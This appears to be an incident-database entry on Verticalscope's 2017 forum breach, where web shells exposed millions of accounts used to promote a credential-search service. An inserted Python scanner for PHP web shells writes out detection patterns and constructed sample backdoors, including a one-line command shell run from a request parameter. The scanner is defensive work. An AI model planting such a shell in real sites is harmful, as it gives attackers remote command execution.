
Cyber Incident Victim: Verticalscope

Date:

Nov 2017

Location:

Canada

Summary

A Canadian online forum operator experienced a second security compromise, impacting millions of user accounts across multiple platforms. Attackers infiltrated six websites, deploying web shells that enabled remote administration and unauthorized database access, exposing credentials, email addresses, and IP addresses. The intrusion was identified after hackers advertised access to the compromised systems to promote a paid breach data search service. The company responded by removing malicious files, expiring affected user passwords, enhancing detection mechanisms, and restricting access. Impacted forums included automotive and hobbyist communities, with evidence suggesting connections to previous breaches involving similar credential-selling platforms. This recurrence highlighted persistent vulnerabilities despite prior incidents, though the organization implemented containment measures upon discovery.

CIA Posture: Available to members
Motives: 2 motives
Tactics, Techniques & Procedures: 1 technique
Threat Actors: 0 actors
Type: Available to members
Location: Available to members

Description

Verticalscope, a Canadian company managing hundreds of web discussion forums, experienced its second significant security breach in approximately two years, with evidence of the intrusion surfacing around November 2, 2017. Security researcher Alex Holden of Hold Security identified hackers actively selling access to Verticalscope.com and its affiliated sites, initially suspecting a resale of data from the 2016 breach that exposed 45 million accounts. Further investigation revealed fresh compromises, as hackers provided screenshots demonstrating active web shells—malicious backdoors enabling remote administration—on Verticalscope.com and Toyotanation.com, a high-traffic automotive forum. The attackers inadvertently exposed critical details in these screenshots, allowing Holden to locate at least two backdoors. Verticalscope confirmed unauthorized access to six websites, attributing it to file-level intrusions. The company responded by removing compromised file managers, expiring all passwords on affected sites, adding malicious file patterns to detection tools, and implementing additional access restrictions. Impacted forums included Toyotanation.com, Jeepforum.com (Verticalscope’s second-largest site), and watchuseek.com, though the full scope remained unclear beyond the confirmed 2.7 million user accounts.
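The remediation described above (pulling dropped file managers off the web root and feeding their file patterns into detection tooling) comes down to a content-and-location sweep of the forum's web root. The script below is an added example, not Verticalscope's own tooling or signatures: the indicator regexes are assumptions chosen to reflect common PHP web-shell traits (obfuscated `eval`, shell commands fed from request parameters, request values used as callables, a browser file-manager front end), and the upload-directory names and sample files are constructed for the demonstration.

```python
"""Sweep a forum web root for planted PHP web shells and file managers.

Added example for illustration only. The indicator patterns and the
upload-directory list below are assumptions, not the signatures that
Verticalscope actually deployed.
"""
import os
import re
import tempfile

# Indicator name -> regex over file contents (assumed patterns).
SHELL_PATTERNS = {
    # obfuscated payload handed straight to eval()
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # shell command taken directly from a request parameter
    "cmd_from_request": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # request parameter used as a callable, e.g. $_GET['f']($_GET['a'])
    "request_as_callable": re.compile(
        r"\$_(?:GET|POST|REQUEST)\s*\[[^\]]+\]\s*\(", re.I),
    # browser-based file manager UI typical of dropped admin shells
    "file_manager_ui": re.compile(
        r"<title>\s*(?:File\s*Manager|WSO|c99|r57)", re.I),
}

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")

# Directories that should only ever hold user-supplied data, never code
# (assumed layout; adjust to the real forum install).
UPLOAD_DIRS = {"images", "uploads", "attachments"}


def scan_file(path):
    """Return the indicator names whose regex matches the file's contents."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        data = fh.read()
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(data)]


def scan_webroot(root):
    """Walk a web root; return {relative_path: [indicators]} for flagged PHP files.

    A PHP file inside an upload directory is flagged on location alone,
    since nothing legitimate should execute from there.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root)
            hits = scan_file(full)
            if set(rel.split(os.sep)[:-1]) & UPLOAD_DIRS:
                hits.append("php_in_upload_dir")
            if hits:
                findings[rel] = hits
    return findings


def build_sample_webroot():
    """Create a constructed web root: one benign file plus two planted backdoors."""
    root = tempfile.mkdtemp(prefix="forum_webroot_")
    os.makedirs(os.path.join(root, "images", "avatars"))
    os.makedirs(os.path.join(root, "inc"))
    samples = {
        # benign forum code: reads a request parameter, but only as data
        "index.php": "<?php\n$tid = (int)$_GET['t'];\necho render_thread($tid);\n",
        # minimal command shell hidden among avatar uploads
        "images/avatars/av_1337.php":
            "<?php if(isset($_GET['c'])){ echo shell_exec($_GET['c']); } ?>\n",
        # obfuscated loader with a file-manager front end
        "inc/fm.php":
            "<html><title>File Manager</title></html>\n"
            "<?php eval(base64_decode('cGhwaW5mbygpOw=='));\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for rel_path, indicators in sorted(scan_webroot(sample_root).items()):
        print(f"{rel_path}: {', '.join(indicators)}")
```

Running it flags the avatar-directory shell both for its content and for its location, and the loader for its obfuscated `eval` and file-manager title, while the benign `index.php` stays clean. In a real sweep the content regexes will produce false positives on legitimate plugins that call `eval`, so the location rule (code where only uploads belong) and a comparison against a known-good deployment manifest are the stronger signals.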


The breach’s aftermath revealed commercial motives, as attackers leveraged the incident to promote LuiDB, a paid service resembling the defunct Leakedsource.com, which historically sold breached credentials. LuiDB offered search capabilities for compromised credentials—including usernames, passwords, emails, and IP addresses—with subscription fees ranging from $5 to $400 in Bitcoin. This mirrored Verticalscope’s 2016 breach, where Leakedsource had publicly exposed user data. Forensic analysis linked the intrusion to Pastebin posts advertising LuiDB, though these were later deleted. Verticalscope’s statement emphasized containment efforts but did not disclose whether user data was exfiltrated or the duration of unauthorized access. The incident underscored risks associated with password reuse across forums and other services, though the narrative did not confirm specific victim impacts beyond credential exposure. Verticalscope’s corrective actions focused on technical containment without addressing broader security enhancements like multi-factor authentication, which remained uncommon across its forums.

Sources
1 source (available to members)